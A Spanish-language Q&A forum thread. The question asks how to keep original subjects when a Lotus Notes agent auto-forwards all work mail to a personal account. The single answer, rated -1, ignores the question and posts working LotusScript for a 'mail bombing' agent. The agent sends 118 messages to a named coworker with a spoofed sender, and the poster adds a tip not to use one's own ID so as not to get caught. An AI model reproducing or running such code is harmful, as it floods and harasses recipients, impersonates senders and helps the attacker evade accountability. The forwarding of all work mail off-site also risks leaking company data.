Mantener el asunto

Hola, en el lugar en que trabajo usamos lotus notes. He creado un asistente para que me reenvíe todos los correos que entran a mi cuenta en el trabajo, a mi cuenta personal. Funciona a la perfección, el único inconveniente es que el "Asunto" que trae ese correo es siempre el mismo predefinido al hacer el agente, como p/e correo del trabajo.
Quiero saber, si hay alguna manera de hacer que el asistente reproduzca el MISMO asunto que trae estipulado el correo original, p/e si el correo esta titulado "Lista de empleados" que al retransmitirse a mi casilla figure como "Lista de empleados" y no "correo del trabajo". Gracias. Cricrincha

1 respuesta

Respuesta
-1
Te paso el código dee un mail bombing que hice je je para fastidiar un ratillo a los de mi curro, de un agente LotusScript.
El campo que debes rellenar es el de subject
Hola gente!,
¿Queréis pasar un rato divertido en el trabajo?
Pues intentad crear este agente:
Const MAX_CORREO = 118
Dim correo As NotesDocument
Dim db As NotesDatabase
Dim s As New NotesSession
Dim index As Integer
Set db = s.currentdatabase
Dim nombres(1 To 1) As String
nombres(1) = "Raúl /FB2004"
index=0
While index <> MAX_CORREO
Set correo = New NotesDocument( db )
'Por si queremos enviar un correo con un formulario en concreto
correo.Form = "CORREO"
correo.SendTo = nombres
correo.From = "[email protected]"
'correo.Principal = "Manolo Cabezahuevo"
correo.tmpDisplaySentBy = "Manolo Cabezahuevo"
'correo.Subject = "Mail BOMBING!!!!! - Pa tí joven nacional solo te quedan:"+Cstr(MAX_CORREO-index)+" mensajes"
Call correo.Send( True )
index = index+1
Wend
Ya está! Te puedes divertir un ratillo...
P.D.:Vigilad de noenviarlo con vuestro ID, que os pillaran fácilmente.
Ta luegor!